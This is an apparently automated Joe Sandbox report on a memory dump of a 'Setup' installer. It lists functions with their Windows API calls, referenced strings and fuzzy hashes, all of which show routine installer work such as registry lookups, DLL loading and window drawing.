
Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: D41500D41520D41540
String ID: n_I
API String ID: 2153611984-2401994647
Opcode ID: e4d161465f036a103ebb289189d3cd0f170a5630909247fb2ee4af93fb68b9e6
Instruction ID: 4f8324d0d9967553cfa4e2087f5e207790f68935e4380d12614fc4779ec75e8b
Opcode Fuzzy Hash: e4d161465f036a103ebb289189d3cd0f170a5630909247fb2ee4af93fb68b9e6
Instruction Fuzzy Hash: 5F219571A00248AFDB02DAA98C41EAFB7FCEB49301F55447AF800E3352D6799E04C769

Function 0044ABE0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMON

Download Yara Rule

APIs

73A1A570.USER32(00000000,?,00000000,00000000,0044ACE1,?,{H,?,?), ref: 0044AC55
SelectObject.GDI32(?,00000000), ref: 0044AC78
73A1A480.USER32(00000000,?,0044ACB8,00000000,0044ACB1,?,00000000,?,00000000,00000000,0044ACE1,?,{H,?,?), ref: 0044ACAB

Strings

{H, xrefs: 0044ABE8

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: A480A570ObjectSelect
String ID: {H
API String ID: 1230475511-1783425356
Opcode ID: 3ef627e0227541c160f5483f4411feea27e9077cc7b2a08faaabc4aa9260d785
Instruction ID: 3b5f26ead791ea6387a249f2cdaddc54e41ca9264cf2fbaff888b01415335cc3
Opcode Fuzzy Hash: 3ef627e0227541c160f5483f4411feea27e9077cc7b2a08faaabc4aa9260d785
Instruction Fuzzy Hash: CA21B670E44248AFEB01DFA5C885B9F7BB9EB48304F41807AF500E7281D77C9950CB6A

Function 0044A914 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044A9A0,?,{H,?,?), ref: 0044A972
DrawTextW.USER32(?,?,00000000,?,?), ref: 0044A985
DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044A9B9

Strings

{H, xrefs: 0044A91C

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: DrawText$ByteCharMultiWide
String ID: {H
API String ID: 65125430-1783425356
Opcode ID: 18b169e245813401a0f41c477646881a2abd9a6b0717883cb275958d94a96fcb
Instruction ID: 8b0288b9d3461177b0e2011e4a6e3c0ecae8d00baf86e8e824f1a66b6306016d
Opcode Fuzzy Hash: 18b169e245813401a0f41c477646881a2abd9a6b0717883cb275958d94a96fcb
Instruction Fuzzy Hash: 0E11B6B27446047FEB10DAAA9C82E6FB7ECEB49724F10417BF504E7290D6389E018669

Function 00404D2A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
ExitProcess.KERNEL32 ref: 00404E0D

Strings

Error, xrefs: 00404DB9
Runtime error at 00000000, xrefs: 00404DBE, 00404DD1

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: ExitMessageProcess
String ID: Error$Runtime error at 00000000
API String ID: 1220098344-2970929446
Opcode ID: 65f8ed0532075a2792cd4408a2c9e4abcf3b0691aeac86d53ce49d1bb586f2e2
Instruction ID: 7c754c0b660761a5bc1c63aadfae0e1dd2c0c13e95eab211716155318e46cc07
Opcode Fuzzy Hash: 65f8ed0532075a2792cd4408a2c9e4abcf3b0691aeac86d53ce49d1bb586f2e2
Instruction Fuzzy Hash: E421CB606442514ADB11AB799C857163B9197E534CF04817BE700B73F2CA7D9C64C7EF

Function 00455EF4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4

Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9

LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00455F48
RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00455F75

Strings

LoadTypeLib, xrefs: 00455F53
RegisterTypeLib, xrefs: 00455F80

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
String ID: LoadTypeLib$RegisterTypeLib
API String ID: 1312246647-2435364021
Opcode ID: 8db503a5e71761849dda00c4474342a384a20319f516bd6a6f52dcc7b471ddee
Instruction ID: 9dd964af6d171c160354b7431e2e7bf6b237ee99b3e18c78647d6df6d6a6389e
Opcode Fuzzy Hash: 8db503a5e71761849dda00c4474342a384a20319f516bd6a6f52dcc7b471ddee
Instruction Fuzzy Hash: 9B119632B00A04BFDB11DFA6CD6196EB7ADEB89715F10847AFC04D3652D6789904CB54

Function 0045644C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00456466
SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 00456503

Strings

Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00456492
Failed to create DebugClientWnd, xrefs: 004564CC

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: MessageSend
String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
API String ID: 3850602802-3720027226
Opcode ID: de1203681df2f13ee3edcb29637d6c05e1bb22d995aac381a7a8ad744fd246b2
Instruction ID: d6336fda61e0ff9d2ebfbe9a4145e2f7bc73dda7394494d671267afbd3e9fcca
Opcode Fuzzy Hash: de1203681df2f13ee3edcb29637d6c05e1bb22d995aac381a7a8ad744fd246b2
Instruction Fuzzy Hash: 6F11E3B06042506FD310AB299C41B5B7BA89B5630DF45443BF984DF387D3798818CBAE

Function 00451E58 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,00000000,?,?,puE,00000000,XuE,?,?,?,00000000,00451ED2,?,?,?,00000001), ref: 00451EAC
GetLastError.KERNEL32(00000000,00000000,?,?,puE,00000000,XuE,?,?,?,00000000,00451ED2,?,?,?,00000001), ref: 00451EB4

Strings

XuE, xrefs: 00451E96, 00451E99
puE, xrefs: 00451E9E, 00451EA1

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CreateErrorLastProcess
String ID: XuE$puE
API String ID: 2919029540-1777687408
Opcode ID: 580679ce379f8f7afcc534052ea274c8dd9b0fe1af2aa12b246822f2a6cdac89
Instruction ID: 005b97d9f3d6fc2d61eebea25250fab46ca672ee3877172d18c79183b21e8564
Opcode Fuzzy Hash: 580679ce379f8f7afcc534052ea274c8dd9b0fe1af2aa12b246822f2a6cdac89
Instruction Fuzzy Hash: 1B113C76600208AF8B50DEADDC41EEB77ECEB4D310B51456ABD18E3251D634AD148B64

Function 00477308 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 004242D4: SetWindowTextA.USER32(0001041A,00000000), ref: 004242EC

GetFocus.USER32 ref: 00477373
GetKeyState.USER32(0000007A), ref: 00477385
WaitMessage.USER32(?,00000000,004773AC,?,00000000,004773D3,?,?,00000001,00000000,?,?,?,0047EBCA,00000000,0047FACB), ref: 0047738F

Strings

Wnd=$%x, xrefs: 00477357

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: FocusMessageStateTextWaitWindow
String ID: Wnd=$%x
API String ID: 1381870634-2927251529
Opcode ID: 74c7d81c0a94b14d72896173badfac2de004896181af197dda579923c67c8a60
Instruction ID: f0690932e29077b4fb13f85f05d0aefb3d3524bf13f98187e5fd5d5cdf43dc38
Opcode Fuzzy Hash: 74c7d81c0a94b14d72896173badfac2de004896181af197dda579923c67c8a60
Instruction Fuzzy Hash: 8711A330608244EFC701EF65DC42A9E77B9EB09718B9184B6FC08E3791D73C6E00DA69

Function 0046D788 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46timeCOMMON

Download Yara Rule

APIs

FileTimeToLocalFileTime.KERNEL32(000000FF), ref: 0046D790
FileTimeToSystemTime.KERNEL32(?,?,000000FF), ref: 0046D79F

Strings

%.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u, xrefs: 0046D814
(invalid), xrefs: 0046D822

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Time$File$LocalSystem
String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
API String ID: 1748579591-1013271723
Opcode ID: 0a98023ab13e448872c12fbe6f13c89687d1b5f5aae4a43975ed4079bbbdddec
Instruction ID: b3b582457b019a17bb8afa83b58bfba6494bfd74b872bfeb83ea535623e92781
Opcode Fuzzy Hash: 0a98023ab13e448872c12fbe6f13c89687d1b5f5aae4a43975ed4079bbbdddec
Instruction Fuzzy Hash: CE11FBA090C3909AD340DF6AC44432BBAE4AB89714F04492EF9D8D6381E779C948DBB7

Function 00454F3C Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60

RegCloseKey.ADVAPI32(?,00454FA7,?,00000001,00000000), ref: 00454F9A

Strings

PendingFileRenameOperations2, xrefs: 00454F7B
PendingFileRenameOperations, xrefs: 00454F6C
SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454F48

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CloseOpen
String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
API String ID: 47109696-2115312317
Opcode ID: 0f77721fb92891f933fdfea4deecb4349dba8abd6b34e90bb27289d97912e86e
Instruction ID: 4e36f23c0afdd0c8c7c5a5796e308a2b8506757bff9ef38b92e62c150fb0ca3e
Opcode Fuzzy Hash: 0f77721fb92891f933fdfea4deecb4349dba8abd6b34e90bb27289d97912e86e
Instruction Fuzzy Hash: 67F062322142446FD70596AAEC13E1B73EEE7C471DFA04466F800DB582DA79AD94962C

Function 0048213C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60

RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 0048217D
RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 004821A0

Strings

System\CurrentControlSet\Control\Windows, xrefs: 0048214A
CSDVersion, xrefs: 00482174

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: CSDVersion$System\CurrentControlSet\Control\Windows
API String ID: 3677997916-1910633163
Opcode ID: e2ad03386ee157ef29304d30407074c072a20ac6e3b84044583daa6995a5615b
Instruction ID: 234b749f7f851cfbfd5644349c5fd5927c737282cf1b30e82c7fcc64daf3ae2d
Opcode Fuzzy Hash: e2ad03386ee157ef29304d30407074c072a20ac6e3b84044583daa6995a5615b
Instruction Fuzzy Hash: 1CF03675E40209B6DF10EAD08D49B9F73BCAB05704F604567EE10E7280E7B89A448759

Function 00458B84 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60

RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00458CC1,00000000,00458E79,?,00000000,00000000,00000000), ref: 00458BD1

Strings

.NET Framework not found, xrefs: 00458BE0
InstallRoot, xrefs: 00458BC0
SOFTWARE\Microsoft\.NETFramework, xrefs: 00458BA4

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CloseOpen
String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
API String ID: 47109696-2631785700
Opcode ID: ed51067860bf4e9bd4b6b2026591f41c13ec9fcc0b0cd64ea19f1b1b9b7e8f7b
Instruction ID: 6d8b28394c42fe518be87e1bc96ea370ff989b9669e1d7f51fc18c3a52dee8f8
Opcode Fuzzy Hash: ed51067860bf4e9bd4b6b2026591f41c13ec9fcc0b0cd64ea19f1b1b9b7e8f7b
Instruction Fuzzy Hash: 78F0A4B1704110ABD710EB1AE845F5A629CDB91356F20503FF581EB292CE7CDC068AAA

Function 0042D8BC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,004531CA,00000000,0045326D,?,?,00000000,00000000,00000000,00000000,00000000,?,00453539,00000000), ref: 0042D8D6
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D8DC

Strings

GetSystemWow64DirectoryA, xrefs: 0042D8CC
kernel32.dll, xrefs: 0042D8D1

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetSystemWow64DirectoryA$kernel32.dll
API String ID: 1646373207-4063490227
Opcode ID: 722b137f341c3d115badbf2e0eef5a38a5fbdade9101237aa22081eebe3438ad
Instruction ID: 226daeffb333c7fd56417753f7bf411e9e50fb36e69144697282a220664082a3
Opcode Fuzzy Hash: 722b137f341c3d115badbf2e0eef5a38a5fbdade9101237aa22081eebe3438ad
Instruction Fuzzy Hash: 8CE026E0F00B0012D70035BA2C83B6B108D8B88729FA0443F7899F62C7DDBCDAC40AAD

Function 0042E9C8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042E944), ref: 0042E9D6
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9DC

Strings

ShutdownBlockReasonDestroy, xrefs: 0042E9CC
user32.dll, xrefs: 0042E9D1

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: ShutdownBlockReasonDestroy$user32.dll
API String ID: 1646373207-260599015
Opcode ID: 3cb91fe046ffa2f0cafd2f1203d511bf401be2c66f0b830a4c7447277c462387
Instruction ID: 6bc70aa2ebf4dd36f12f6c88582c327b68e43ec59fad8d4ed568611576548916
Opcode Fuzzy Hash: 3cb91fe046ffa2f0cafd2f1203d511bf401be2c66f0b830a4c7447277c462387
Instruction Fuzzy Hash: 05D0C7D3351733566D9071FB3CC19AB018C8A116B53540177F500F6141D99DCC4115AD

Function 0044EF98 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004972BA), ref: 0044EFD3
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044EFD9

Strings

NotifyWinEvent, xrefs: 0044EFC9
user32.dll, xrefs: 0044EFCE

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: NotifyWinEvent$user32.dll
API String ID: 1646373207-597752486
Opcode ID: df5501210fbf55c77833839f2e71da502ee8ccb5cb3ddd2a92cfd9f02440f8c8
Instruction ID: d2dc615c88fd328006faf79361cd74abdd3d8da8a377be2bcafca06377aa3dce
Opcode Fuzzy Hash: df5501210fbf55c77833839f2e71da502ee8ccb5cb3ddd2a92cfd9f02440f8c8
Instruction Fuzzy Hash: 37E012F0E41340AEFB00BFFB984271A3AA0B76431CB00007FB40066292CB7C48284A5F

Function 00497030 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,0049730B,00000001,00000000,0049732F), ref: 0049703A
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00497040

Strings

user32.dll, xrefs: 00497035
DisableProcessWindowsGhosting, xrefs: 00497030

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: DisableProcessWindowsGhosting$user32.dll
API String ID: 1646373207-834958232
Opcode ID: 5cf17bf8af5e0a79e5f4ebe452e06fc090858db20e3666522b520eb31a14363f
Instruction ID: 452f54a6037127921152cef0656c2e9433c36e1ae577bdfae3f91b34ce646964
Opcode Fuzzy Hash: 5cf17bf8af5e0a79e5f4ebe452e06fc090858db20e3666522b520eb31a14363f
Instruction Fuzzy Hash: F9B002D16E9701D4DD2032F20D57E1F0C484C4076575515777414F51C7FD6DD9045A7D

Function 00463E1C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0044AEAC: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044EFC9,004972BA), ref: 0044AED3
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044AEEB
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044AEFD
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044AF0F
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044AF21
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF33
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF45
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044AF57
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044AF69
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044AF7B
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044AF8D
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044AF9F
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044AFB1
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044AFC3
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044AFD5
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044AFE7
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044AFF9
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B00B

LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004972DD), ref: 00463E2B
GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00463E31

Strings

SHPathPrepareForWriteA, xrefs: 00463E21
shell32.dll, xrefs: 00463E26

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: SHPathPrepareForWriteA$shell32.dll
API String ID: 2238633743-2683653824
Opcode ID: e554c22c2b6c1c79bf4e3bd9589f638704a5c3b9e23afc358b40755e2967a902
Instruction ID: 7d58e33019c036ad457fb907f94f1e4e419ce3fd113c1db0310001010c17eb6a
